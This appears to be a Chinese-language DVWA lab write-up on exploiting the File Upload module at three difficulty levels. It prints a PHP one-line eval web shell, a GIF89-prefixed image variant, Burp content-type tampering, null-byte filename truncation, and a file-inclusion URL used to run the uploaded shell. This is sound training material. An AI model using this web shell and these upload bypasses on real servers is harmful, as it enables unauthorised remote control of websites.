dvwa-File Upload

Low

源码

image.png

可以看到Low级别的代码 没有对上传的文件做 任何限制 可以直接
上传一句话木马

<?php @eval($_POST['as']);?>

image.png
打开/hackable/uploads目录查看一下
image.png
可以看到已经上传成功
用中国菜刀或者中国蚁剑连接
image.png image.png

Medium

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

burp抓包修改文件类型
中等级限制只能上传jpg和png 文件且文件大小不能超过100000

image.png
image.png

上传成功 中国菜刀连接就行了

方法二：00截断

image.png image.png image.png

可以看到文件已经变了

image.png

截断二：

我们将文件名改为 a.php%00.jpg

image.png

然后我们选中 %00 ，然后进行URL-decode

image.png

点击 go ，文件上传成功

image.png

High

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

获取文件后缀名
$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
他的作用是什么呢？
其实他是防范iis 6.0文件解析漏洞的，有时我们为了绕过限制会提交这样形式的文件：
Xx.asp;.xx.jpg xx.jpg
而这句话的作用就是说它会验证文件的最后一个点之后的格式上面的例子来说就是不管你前面写了多少，我只验证最后的 ’.jpg’。

if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) )
同时这句话对上传文件的类型做了更明确的要求，只识别jpg 和 jpeg 的文件，这个就有些难度了，而我们只能尝试一下%00截断了。

%00在url语言里代表空格“ ”，因此它起到的作用就是截断文件的后半段，让它识别到的文件格式是.jpg，而解析时会是前面的脚本格式。我们试一下。

相关函数

substr()

substr() 函数返回字符串的一部分。
注释：如果 start 参数是负数且 length 小于或等于 start，则 length 为 0。
语法
substr(string,start,length)

strrpos()

定义和用法
strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。
注释：strrpos() 函数对大小写敏感
strrpos(string,find,start)

strtolower()把所有字符转换为小写

getimagesize

getimagesize(string) ：函数将测定任何 GIF，JPG，PNG，SWF，SWC，PSD，TIFF，BMP，IFF，JP2，JPX，JB2，JPC，XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串。如果不能访问 filename 指定的图像或者其不是有效的图像，getimagesize() 将返回 FALSE 并产生一条 E_WARNING级的错误。所以 getimagesize函数的作用是判断上传的文件是不是有效的图片

00截断

点击 go ，文件上传失败

image.png

直接上传一句话木马，然后把文件名改为 a.jpg

image.png

原因是因为

(1)在php<5.3.4中，处理字符串的函数认为0x00是终止符。那么我们可以利用 00截断 漏洞来上传我们的一句话木马 但是实验环境是php5.4.45
(2)因为仅仅后缀是图片格式的还不行，文件内容必须还得是图片格式的
在文件头部加了jpg格式的 GIF89 标识后成功上传！

GIF89
<?php @eval($_POST['as'])?>

修改后上传成功

image.png

虽然我上传成功了，但以jpg为后缀的，菜刀不能直接连接，必须让他作为php解析
怎么才能让我们的图片以 php 格式运行呢？
我们可以利用DVWA的文件包含漏洞，让我们的图片格式的一句话木马以php格式运行。
访问

http://localhost/DVWA-master/vulnerabilities/fi/?page=file:///E:/phpstudy/PHPTutorial/WWW/DVWA-master/hackable/uploads/1.jpg

然后我们就可以用中国菜刀进行连接了

因为这个网站是要登录的，所以我们在菜刀中右键，然后浏览网站，然后登录就可以在菜刀中保持我们的session。然后就可以获取Webshell了。

image.png

但是发现那里不对。。。。。

image.png
连的不是我的本地。。。。。
不懂

尝试另一种方法

image.png image.png

图片可以正常访问

image.png
但是浏览器无法解析
image.png
换成jpg格式试试
image.png image.png
image.png
。。。。还是不行
参考一

参考二